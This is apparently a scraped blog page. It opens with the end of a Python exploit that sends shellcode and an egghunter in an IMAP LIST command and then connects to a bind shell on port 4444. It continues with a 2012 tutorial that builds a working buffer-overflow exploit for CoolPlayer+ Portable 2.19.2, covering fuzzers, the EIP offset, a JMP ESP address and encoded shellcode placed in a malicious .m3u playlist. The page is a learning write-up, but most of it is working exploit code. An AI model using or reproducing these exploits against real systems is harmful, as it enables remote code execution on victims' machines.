"\x31\x42\x12\x03\x42\x12\x83\xf7\x8b\x14\xd9\xfb\x1e\x32\x6f\xeb"
"\x26\x3b\x8f\x14\xb8\x4f\x1c\xce\x1d\xdb\x98\x32\xd5\xa7\x27\x32"
"\xe8\xb8\xa3\x8d\xf2\xcd\xeb\x31\x02\x39\x5a\xba\x30\x36\x5c\x52"
"\x09\x88\xc6\x06\xee\xc8\x8d\x51\x2e\x02\x60\x5c\x72\x78\x8f\x65"
"\x26\x5b\x58\xec\x23\x28\xc7\x2a\xad\xc4\x9e\xb9\xa1\x51\xd4\xe2"
"\xa5\x64\x01\x1f\xfa\xed\x5c\x73\x26\xee\x3f\x48\x17\xd5\xa4\xc5"
"\x1b\xd9\xaf\x99\x97\x92\xc0\x05\x05\x2f\x60\x3d\x0b\x58\xef\x73"
"\xbd\x74\xbf\x74\x17\xe2\x13\xec\xf0\xd8\xa1\x98\x77\x6c\xf4\x07"
"\x2c\x6d\x28\xdf\x07\x7c\x35\x24\xc8\x80\x10\x05\x61\x9b\xfb\x38"
"\x9c\x6c\x06\x6f\x35\x6f\xf9\x5f\xa1\xb6\x0c\xaa\x9f\x1e\xf0\x82"
"\xb3\xf3\x5d\x79\x67\xb7\x32\x3e\xd4\xc8\x65\xa6\xb2\x27\xda\x40"
"\x10\xc1\x03\x19\xfe\x75\xd9\x51\x38\x22\x21\x47\xac\xdd\x8c\x32"
"\xce\x0e\x46\x18\x9d\x81\x7e\x37\x21\x0b\xd3\xe2\x22\x64\xbc\xe9"
"\x94\x03\x74\xa6\xd9\xda\xd7\x1c\x72\xb6\x28\x4c\xe9\x50\x30\x15"
"\xc8\xd8\xe9\x1a\x02\x4f\xe9\x34\xcd\x1a\x71\xd2\x7a\xb8\x14\x93"
"\x9e\x54\xb7\xfa\x49\x65\xbe\x1b\xe3\x31\x48\x01\xc5\x79\xb9\x6f"
"\xd8\x38\x13\x91\x67\x91\xf8\xe0\x12\xd1\x55\x51\x49\x49\xd8\x5b"
"\x3d\x9c\xe3\xd6\x06\x5e\xcd\x43\xd0\xf2\xa3\x22\x8f\x98\x42\x95"
"\x7e\x08\x14\xea\x51\xda\x3b\xcd\x57\xd5\x17\x12\x81\x83\x68\x13"
"\x19\xab\x47\x60\x31\xaf\xeb\xb2\xda\xb0\x3a\x68\xdc\x9f\xab\xf2"
"\xfa\xc2\x5f\x59\x04\xd4\x5f\x8d") #bad char 00,0a,0d,
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
buffer = "\x90" * (738-len(shellcode))
buffer += shellcode
buffer += "\x90" * 32
buffer += "\xeb\x06\x90\x90"
buffer += "\x4e\x3b\x01\x10"
buffer +=  egghunter
buffer += "\x90" * (800-len(buffer))
exploit = "a001 LIST " + buffer + "}" + "\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.56.101",143))
s.recv(1024)
s.send(exploit)
s.close()
print "Waiting for 10 sec ..."
time.sleep(10) #waiting until egghunter proses done, please be patient
print "Try to connect ..."
os.system("telnet 192.168.56.101 4444")


OK, run the fuzzer again, and I got this



Monday, 8 October 2012

Buffer Overflow CoolPlayer+ Portable 2.19.2

Posted by at 12:54
Today I learned about the buffer overflow in CoolPlayer+ Portable 2.19.2. This is an audio player for Windows. I need to prepare some tools for exploitation.

  1. Windows XP SP 3 English
  2. Ollydbg
  3. Metasploit
  4. Geany text editor
First, I will create a fuzzer. I step the fuzzer from 100 up to 1000 bytes. With a fuzzer size of 100 bytes the application crashes, but the stack space for the payload is too small. So I tried a 1000-byte fuzzer; the application crashes too, and the stack space is enough.


#!C:\Python27\python.exe

########################################
## Information Security Shinobi Camp              #
##    http://is2c-dojo.com                       #
##    http://scx020c07c.blogspot.com                    #
########################################

# How to use
# fuzzer.py playme.m3u "\x41" 1000

import sys
filename = sys.argv[1]
my_args  = sys.argv[2]
long_args= int(sys.argv[3])

sploit = my_args * long_args

fopen = open(filename,'w')
fopen.write(sploit)
Run the fuzzer, open the playlist using CoolPlayer and look at EIP. EIP was overwritten.
After overwriting EIP, I need to know exactly where EIP is overwritten.
Use Metasploit pattern_create to check it:
./pattern_create.rb 1000


Edit the fuzzer:


#!C:\Python27\python.exe
########################################
## Information Security Shinobi Camp              #
##    http://is2c-dojo.com                       #
##    http://scx020c07c.blogspot.com                    #
########################################
filename = "playme.m3u"
junk = ".....pattern_create......"
sploit = junk
fopen = open(filename,'w')
fopen.write(sploit)


Now, re-run the fuzzer. Reopen OllyDbg and attach to CoolPlayer. Load playme.m3u again.
Look at EIP, copy the value and check it using pattern_offset from the Metasploit tools
./pattern_offset.rb 30684139
which returns the value 209. Now go back to the fuzzer and edit it to look like this:



#!C:\Python27\python.exe
########################################
## Information Security Shinobi Camp              #
##    http://is2c-dojo.com                       #
##    http://scx020c07c.blogspot.com                    #
########################################
filename = "playme.m3u"
junk = "\x90" * 209
junk += "\xEF\xBE\xAD\xDE"
junk += "\x41" * (1000-len(junk))
sploit = junk
fopen = open(filename,'w')
fopen.write(sploit)

Run the fuzzer, restart Olly and CoolPlayer. Then load playme.m3u again. Make sure that EIP was overwritten with DEADBEEF.
Then we need a module that has the opcode JMP ESP.
Click View->Executable Modules, double click SHELL32.dll. Search for JMP ESP: right click->Search For->Command, enter JMP ESP. Please note the address of JMP ESP.

Back in the right block of the CPU window, click on ESP and right click Follow in Dump.
We can see that the space for the payload is enough for an Execute Command payload. So I will use it.
Generate the payload using Metasploit; the bad characters are 00, 0a, 0d
Edit the fuzzer again:

#!C:\Python27\python.exe
junk = "\x90" * 209
junk += "\xD7\x30\x9D\x7C" # JMP ESP
junk += "\x90" * 16
junk += ("\xba\x90\x6e\xa9\x03\xdb\xc1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x32\x83\xc3\x04\x31\x53\x0e\x03\xc3\x60\x4b\xf6\x1f\x94\x02"
"\xf9\xdf\x65\x75\x73\x3a\x54\xa7\xe7\x4f\xc5\x77\x63\x1d\xe6"
"\xfc\x21\xb5\x7d\x70\xee\xba\x36\x3f\xc8\xf5\xc7\xf1\xd4\x59"
"\x0b\x93\xa8\xa3\x58\x73\x90\x6c\xad\x72\xd5\x90\x5e\x26\x8e"
"\xdf\xcd\xd7\xbb\x9d\xcd\xd6\x6b\xaa\x6e\xa1\x0e\x6c\x1a\x1b"
"\x10\xbc\xb3\x10\x5a\x24\xbf\x7f\x7b\x55\x6c\x9c\x47\x1c\x19"
"\x57\x33\x9f\xcb\xa9\xbc\xae\x33\x65\x83\x1f\xbe\x77\xc3\xa7"
"\x21\x02\x3f\xd4\xdc\x15\x84\xa7\x3a\x93\x19\x0f\xc8\x03\xfa"
"\xae\x1d\xd5\x89\xbc\xea\x91\xd6\xa0\xed\x76\x6d\xdc\x66\x79"
"\xa2\x55\x3c\x5e\x66\x3e\xe6\xff\x3f\x9a\x49\xff\x20\x42\x35"
"\xa5\x2b\x60\x22\xdf\x71\xee\xb5\x6d\x0c\x57\xb5\x6d\x0f\xf7"
"\xde\x5c\x84\x98\x99\x60\x4f\xdd\x56\x2b\xd2\x77\xff\xf2\x86"
"\xca\x62\x05\x7d\x08\x9b\x86\x74\xf0\x58\x96\xfc\xf5\x25\x10"
"\xec\x87\x36\xf5\x12\x34\x36\xdc\x70\xdb\xa4\xbc\x76")

sploit = junk

fopen = open("playme.m3u",'w')
fopen.write(sploit)
fopen.close()


Re-run the fuzzer, open CoolPlayer and load playme.m3u again. Look, CoolPlayer crashed and the calculator appears.

